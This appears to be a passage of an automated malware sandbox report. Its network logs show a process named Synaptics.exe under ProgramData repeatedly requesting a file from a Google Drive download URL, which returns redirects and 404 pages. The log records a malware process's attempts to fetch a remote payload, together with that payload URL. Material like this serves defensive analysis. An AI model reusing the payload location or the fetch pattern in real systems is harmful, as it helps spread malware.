                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              106192.168.2.449936142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-9OOW7So4vzAA9hXbDhH-TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              107192.168.2.449935142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-uEU3BkWtqIDCskFdLcK5NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              108192.168.2.449947142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HSUbNlDKZBdWK9jxzGj8QQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              109192.168.2.449949142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jT6QvzK4WnWCOHrt-KXJ7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              110192.168.2.449946142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4WPBgHt9vIUZK99g038ABuJ_VX1M6TSa5DFTHTKwZShXPphdLyYL-ofYOd-fS2bKDZ
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-37OIWwnSQ6xzsPp6UuXoBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 37 44 54 5f 69 65 6d 59 58 76 37 30 6e 33 6c 71 62 2d 65 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="J7DT_iemYXv70n3lqb-eHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              111192.168.2.449948142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC62ktt3FjI-YsePMaq70mzB8lWWnzdRgIeEoh2K9XVT9wc5UXNmTwuOc2LUG6Wa8fzq
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-olwRQhBOL3z26I4KmfU2UQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 51 6f 64 69 69 65 43 61 49 5a 48 78 64 36 49 67 35 4b 76 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="SQodiieCaIZHxd6Ig5Kv_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              112192.168.2.449958142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DvdfCypLo9rBrjVsfzXygA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              113192.168.2.449959142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-a5Tyz1_kG-rGPrWL9Lh2SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              114192.168.2.449960142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4SldqoJVino5WSWuTpw86WRF1RDmsp8b9M-0YSs-NYJbo0ned9MzeHt4zeYoi59obn
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:34 GMT
